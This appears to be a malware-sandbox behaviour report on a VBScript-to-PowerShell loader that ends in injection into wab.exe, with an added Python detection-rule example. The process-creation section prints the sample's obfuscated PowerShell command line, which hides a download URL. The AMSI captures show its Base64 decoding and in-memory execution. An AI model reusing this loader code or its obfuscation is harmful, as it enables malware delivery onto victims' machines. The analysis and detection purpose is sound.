              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6536
              Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. 
PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCing
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
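The process-creation chain listed above (wscript.exe spawning a 64-bit powershell.exe with a 6908-byte command line, that powershell.exe spawning cmd.exe to echo %appdata%, then a SysWOW64 powershell.exe, and finally wab.exe) is what the report's "Wscript starts Powershell", "Very long command line found", "Suspicious execution chain found" and "Creates a process in suspended mode" signatures key on. The Python below is an added example, not part of the report, that encodes those parent/child relationships as rules over Sysmon-style process-creation records. The events are constructed to mirror the chain above (the long command line is padded filler of comparable size, not the real script), and the 4096-byte threshold, the rule names and the `INJECTION_TARGETS` set are assumptions to tune against your own telemetry.

```python
import ntpath
import re
from dataclasses import dataclass

# Assumed threshold: the sample's command line measured 6908 bytes in the report;
# 4096 is a constructed cut-off, not a value taken from the report.
LONG_CMDLINE = 4096
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# The child the report's chain ends in (assumed list; extend from your own data).
INJECTION_TARGETS = {"wab.exe"}


@dataclass
class ProcEvent:
    """Minimal Sysmon EID 1 / Security 4688-style process-creation record."""
    parent_image: str
    image: str
    command_line: str


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def _is_wow64(path: str) -> bool:
    return "\\syswow64\\" in path.lower()


def evaluate(ev: ProcEvent) -> list:
    """Return the names of every rule the event trips, in a fixed order."""
    parent, child = _base(ev.parent_image), _base(ev.image)
    hits = []
    if parent in SCRIPT_HOSTS and child in POWERSHELL:
        hits.append("script_host_spawns_powershell")
    if child in POWERSHELL and len(ev.command_line) >= LONG_CMDLINE:
        hits.append("very_long_powershell_command_line")
    if (parent in POWERSHELL and child in POWERSHELL
            and not _is_wow64(ev.parent_image) and _is_wow64(ev.image)):
        hits.append("powershell_64bit_to_32bit_downgrade")
    if (parent in POWERSHELL and child == "cmd.exe"
            and re.search(r'/c\s+"?\s*echo\s+%\w+%', ev.command_line, re.I)):
        hits.append("cmd_echo_resolves_environment_variable")
    if parent in POWERSHELL and child in INJECTION_TARGETS:
        hits.append("powershell_spawns_injection_target")
    return hits


def triage(events) -> list:
    """(index, hits) for every event that trips at least one rule."""
    out = []
    for i, ev in enumerate(events):
        hits = evaluate(ev)
        if hits:
            out.append((i, hits))
    return out


PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
# Constructed filler of roughly the reported size (6908 bytes); not the real script.
LONG_PS_CMDLINE = f'"{PS64}" "' + "$palaverist = 1;" * 430 + '"'

# Constructed events mirroring the chain in the report, plus one benign launch.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\wscript.exe", PS64, LONG_PS_CMDLINE),
    ProcEvent(PS64, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $"'),
    ProcEvent(PS64, PS32, LONG_PS_CMDLINE),
    ProcEvent(PS32, r"C:\Program Files (x86)\Windows Mail\wab.exe",
              r'"C:\Program Files (x86)\windows mail\wab.exe"'),
    ProcEvent(r"C:\Windows\explorer.exe", PS64, f'"{PS64}" -NoProfile -Command Get-Date'),
]

if __name__ == "__main__":
    for i, hits in triage(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[i]
        print(i, _base(ev.parent_image), "->", _base(ev.image), hits)
```

The cmd.exe rule is worth keeping even though it looks benign on its own: `cmd /c "echo %appdata%\... && echo $"` is how this stage resolves an environment variable into an absolute drop path without touching `[Environment]` from PowerShell, and the same child command line is repeated from the SysWOW64 powershell.exe, so a single rule catches both hops. The bitness downgrade from System32 to SysWOW64 powershell.exe is the step that sets up the 32-bit wab.exe for injection.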
              Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntvdm64.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 (the CLSID of the VBScript scripting engine, i.e. wscript.exe resolving the engine for the .vbs sample)
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb: | source: powershell.exe, 00000004.00000002.2323976689.0000000008840000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ment.Automation.pdb | source: powershell.exe, 00000004.00000002.2315469765.0000000003014000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb | source: powershell.exe, 00000004.00000002.2324570247.00000000088C6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 | source: powershell.exe, 00000004.00000002.2315469765.0000000003014000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbR | source: powershell.exe, 00000004.00000002.2320193055.0000000007728000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb | source: powershell.exe, 00000004.00000002.2315469765.0000000003014000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb | source: powershell.exe, 00000004.00000002.2320193055.0000000007728000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk | source: powershell.exe, 00000004.00000002.2315469765.0000000003014000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("powershell "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thu", "0")
Source: Yara match | File source: 00000004.00000002.2329721255.000000000CC2B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2318228321.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2325090155.0000000008B80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2672896517.0000015C3E291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Oleraceous)$global:Subgroups = [System.Text.Encoding]::ASCII.GetString($Lhunds)$global:Kjortelens=$Subgroups.substring($Stealth,$Smeltediglen)<#skoleudgaven Medansvars Nidification C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Sjlevandringers $reprimanders $Nonhistoric), (ratificeringer @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Forenames = [AppDomain]::CurrentDomain.GetAsse
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Viljekraft)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Lakridskonfekter, $false).DefineType($Tinpeste
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Oleraceous)$global:Subgroups = [System.Text.Encoding]::ASCII.GetString($Lhunds)$global:Kjortelens=$Subgroups.substring($Stealth,$Smeltediglen)<#skoleudgaven Medansvars Nidification C
